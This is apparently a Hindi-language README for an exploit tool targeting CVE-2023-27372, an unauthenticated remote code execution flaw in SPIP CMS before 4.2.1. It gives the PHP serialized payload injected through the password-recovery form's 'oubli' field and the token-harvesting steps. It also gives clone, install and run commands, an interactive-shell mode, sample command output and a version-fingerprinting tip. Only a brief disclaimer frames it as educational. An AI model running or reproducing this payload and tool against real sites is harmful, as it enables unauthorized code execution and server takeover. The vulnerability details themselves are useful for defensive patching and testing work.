
CVE-2023-27372 के लिए इंटरैक्टिव शेल के साथ एक्सप्लॉइट
CVE-2023-27372 के लिए एक्सप्लॉइट, SPIP CMS में एक बिना प्रमाणीकरण वाली रिमोट कोड एक्ज़ीक्यूशन (Remote Code Execution) भेद्यता, जो 4.2.1 से पहले के संस्करणों को प्रभावित करती है।
⚠️ केवल शैक्षिक उद्देश्यों के लिए। केवल उन सिस्टमों पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।
SPIP एक ओपन-सोर्स CMS है जिसका व्यापक रूप से वेब प्रकाशन के लिए उपयोग किया जाता है। यह भेद्यता पासवर्ड पुनर्प्राप्ति फ़ॉर्म (/spip.php?page=spip_pass) में मौजूद है, जहाँ oubli पैरामीटर को उचित सैनिटाइज़ेशन के बिना संसाधित किया जाता है, जिससे हमलावर सर्वर पर मनमाना PHP कोड इंजेक्ट और निष्पादित कर सकता है — बिना किसी प्रमाणीकरण की आवश्यकता के।
| फ़ील्ड | विवरण |
|---|
| CVE | CVE-2023-27372 |
| CVSS स्कोर | 9.8 (क्रिटिकल) |
| हमला वेक्टर | नेटवर्क |
| प्रमाणीकरण | कोई आवश्यक नहीं |
| प्रभावित संस्करण | SPIP < 4.2.1 |
| भेद्यता प्रकार | कोड इंजेक्शन / बिना प्रमाणीकरण वाला RCE |
CSRF टोकन प्राप्त करें — HTML फ़ॉर्म से formulaire_action_args टोकन निकालने के लिए /spip.php?page=spip_pass पर GET अनुरोध भेजा जाता है।
पेलोड बनाएँ — निष्पादित की जाने वाली कमांड के साथ एक PHP सीरियलाइज़्ड स्ट्रिंग तैयार की जाती है:
s:N:"<?php system('COMMAND'); ?>";
जहाँ N आंतरिक PHP स्ट्रिंग की सटीक बाइट लंबाई है।
पेलोड भेजें — CSRF टोकन के साथ oubli फ़ील्ड में तैयार पेलोड के साथ POST अनुरोध भेजा जाता है। SPIP इस फ़ील्ड को बिना सैनिटाइज़ेशन के संसाधित करता है और इंजेक्ट किए गए PHP कोड को निष्पादित करता है।
आउटपुट निकालें — कमांड आउटपुट HTML प्रतिक्रिया के अंदर लौटाया जाता है और oubli इनपुट फ़ील्ड के value एट्रिब्यूट से पार्स किया जाता है।
requestsbeautifulsoup4argparseregex
git clone https://github.com/scriniarii/CVE-2023-27372
cd CVE-2023-27372
pip install requests beautifulsoup4
python3 exploit.py -u <URL> -c <command>
| तर्क | विवरण |
|---|---|
-u, --url | लक्ष्य SPIP इंस्टेंस का बेस URL |
-c, --command | लक्ष्य पर निष्पादित की जाने वाली OS कमांड |
-s, --shell | इंटरैक्टिव शेल |
python3 exploit.py -u http://TARGET/ -c "id"
python3 exploit.py -u http://TARGET/ -s
अपेक्षित आउटपुट:
[+] Token found : JWDCxt5PTFzhPb...
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
किसी लक्ष्य का SPIP संस्करण जाँचने के लिए, HTML में मेटा जनरेटर टैग देखें:
<meta name="generator" content="SPIP 4.2.0" />
[!CAUTION]
⚠️ अस्वीकरण
कृपया मेरे रिपॉज़िटरी में दी गई जानकारी और एक्सप्लॉइट का उपयोग केवल शैक्षिक उद्देश्यों और जिम्मेदार प्रकटीकरण के लिए करें। इन टूल, स्क्रिप्ट या एक्सप्लॉइट के दुरुपयोग या क्षति के लिए मैं जिम्मेदार नहीं हूँ।